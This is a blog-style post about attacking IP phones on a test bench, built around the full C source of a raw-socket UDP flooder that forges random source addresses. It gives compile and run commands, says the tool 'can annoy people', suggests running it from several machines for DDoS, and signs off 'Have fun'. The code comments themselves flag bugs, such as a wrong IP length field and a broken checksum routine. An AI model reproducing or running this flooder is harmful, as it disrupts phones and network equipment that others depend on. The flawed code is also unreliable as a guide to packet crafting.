Yesterday we were still working on some attacks on our test bench, and we tried some exploits for IP phones
that we found on the internet. Most of them caused a DoS or DDoS on the phones,
which means that the phones were basically freezing. Then we made some modifications to a C UDP flooder that I have had for a few years.
The code basically sends UDP packets to random ports on a specific address with a random source address … and only works on Linux.
The code helped us to stop the connection between the 2 phones.
The code sends UDP packets to a phone, which tries to answer with pings (ICMP messages) and becomes unavailable to all the other network devices. Since the UDP packets are crafted with random source addresses (or predefined addresses), the phone replies with pings to these addresses and thus not to your computer.
We also discovered that when the connection between the 2 phones is established, the IP phones were not affected.
The code can be found below or on my github repo
/*
 * Bench-test program that emits raw IPv4/UDP datagrams with a forged source
 * address towards one target address.
 *
 * Traits of the traffic as written here, useful when recognising it in a
 * capture: source address and both ports come from rand(), the payload is
 * the single byte "G" (UDP length 9), the UDP checksum is left at 0, the
 * TTL is set to 255 and the IP identification field is the same constant on
 * every datagram. One run sends 2 * N_LOOP datagrams, spaced U_WAITING
 * microseconds apart.
 *
 * Because the source address is forged, source-address validation at the
 * access layer (BCP 38 / reverse-path filtering) is the control that drops
 * this traffic before it reaches a device.
 */
#include <stdio.h> // printf/fprintf
#include <stdlib.h>
#include <string.h>
#include <netinet/ip.h> // struct ip
#include <sys/socket.h> // socket()
#include <netinet/in.h> // struct sockaddr_in
#define __FAVOR_BSD
#define _USE_BSD
#include <netinet/udp.h> // struct udphdr (BSD field names uh_sport, uh_dport, ...)

#define PADDING_SIZE 1   // payload bytes appended after the UDP header
#define N_LOOP 10        // iterations of the send loop in main()
#define U_WAITING 100000 // pause after each datagram, in microseconds (usleep argument)

void udp(char *);
unsigned short int in_chksum (unsigned short int *, int);
unsigned long hasard(unsigned long, unsigned long);

/*
 * Entry point: seeds rand() from the clock, then sends two datagrams per
 * iteration, printing "-" after the first and "+" after the second.
 * The target is a placeholder string that has to be replaced by a dotted
 * IPv4 address.
 */
main() {
    srand(time(NULL));
    int i;
    for(i=0;i<N_LOOP;i++) {
        udp("xxx.xxx.xxx.xxx");
        usleep(U_WAITING);
        printf("-");
        udp("xxx.xxx.xxx.xxx");
        usleep(U_WAITING);
        printf("+");
    }
}

/*
 * Builds one IPv4 + UDP datagram by hand and sends it to `cible` (French:
 * "target"), a dotted IPv4 address string.
 *
 * A new raw socket is opened and closed on every call. Raw sockets need
 * elevated privileges, which is what the "root ?" hint in the error message
 * refers to.
 */
void udp(char *cible) {
    int sd;
    sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sd == -1) {
        // NOTE(review): the failure is only reported; execution continues
        // with sd == -1, so the later setsockopt() call is what stops the run.
        fprintf(stderr,"socket() error, root ?\n");
    }

    // Forged source address drawn from the upper half of the 32-bit range;
    // it is never the sender's own address, so replies go elsewhere.
    unsigned long ip_src = hasard(4294967295/2,4294967295);
    unsigned long ip_dst = inet_addr(cible);
    // Random source and destination ports; no htons() is applied.
    unsigned short p_src = (unsigned short) hasard(0,65535);
    unsigned short p_dst = (unsigned short) hasard(0,65535);

    struct sockaddr_in sin;
    sin.sin_family = AF_INET;
    sin.sin_port = p_dst;
    sin.sin_addr.s_addr = ip_dst; // destination

    struct ip *ip;
    struct udphdr *udp;
    char *dgm, *data;

    // One buffer holds IP header, UDP header and payload back to back.
    int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE;
    // NOTE(review): the malloc() result is used without a NULL check.
    dgm = (char *) malloc(pksize);
    ip = (struct ip *) dgm;
    udp = (struct udphdr *) (dgm + sizeof(struct ip));
    data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr));
    memset(dgm, 0, pksize);
    memcpy((char *) data, "G", PADDING_SIZE); // fixed one-byte payload

    // IP_HDRINCL: the caller supplies the IP header itself.
    int un = 1;
    if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1) {
        fprintf(stderr,"setsockopt()");
        exit(-1);
    }

    // IP header
    ip->ip_v = 4;
    ip->ip_hl = 5; // 5 * 4 = 20 bytes, i.e. no IP options
    ip->ip_tos = 0;
    ip->ip_len = sizeof(pksize); // NOTE(review): this is the size of an int, not the value of pksize
    ip->ip_ttl = 255;
    ip->ip_off = 0;
    ip->ip_id = sizeof( 45 ); // constant: the size of an int, identical on every datagram
    ip->ip_p = IPPROTO_UDP;
    ip->ip_sum = 0; // marked "to be filled in later", but nothing in this file writes it again
    ip->ip_src.s_addr = ip_src;
    ip->ip_dst.s_addr = ip_dst;

    // UDP header
    udp->uh_sport = p_src;
    udp->uh_dport = p_dst;
    udp->uh_ulen = htons(sizeof(struct udphdr ) + PADDING_SIZE);
    udp->uh_sum = 0; // checksum field left at zero

    // send
    if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr)) == -1) {
        fprintf(stderr,"oops, sendto() error\n");
    }

    // release the buffer and the socket
    free(dgm);
    close(sd);
}

/*
 * 16-bit one's-complement sum over `len` bytes starting at `addr`.
 * Nothing in this file calls it.
 * NOTE(review): the fold step adds 0xffff where the usual Internet checksum
 * masks with 0xffff, so the result differs from the standard algorithm.
 */
u_short in_chksum (u_short *addr, int len) // taken from papasmurf.c
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    // add the buffer up 16 bits at a time
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    // trailing odd byte, if any
    if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w;
        sum += answer;
    }

    sum = (sum >> 16) + (sum + 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}

/*
 * "hasard" is French for "chance": scales one rand() draw into the range
 * starting at `min` and spanning (max - min + 1). The arithmetic is done in
 * single-precision float, so the result is only as fine-grained as a float
 * allows before it is converted back to an integer.
 */
unsigned long hasard(unsigned long min, unsigned long max){
    return (u_long) (min + ((float) rand() / RAND_MAX * (max - min + 1)));
}
The code is working well, and can annoy people without damaging the phone.
you can easily compile it with the following command :
gcc -o udp udp.c
and run it with
./udp
if everything is working you should see
+-+-+-
This appears during run time.
We tested it on 7940 phones from Cisco and it was working pretty well.
Btw: this code can run against multiple kinds of network equipment; it was not dedicated to IP phones, so I guess some kind of DoS or DDoS would be possible by running it on multiple machines.
Have fun.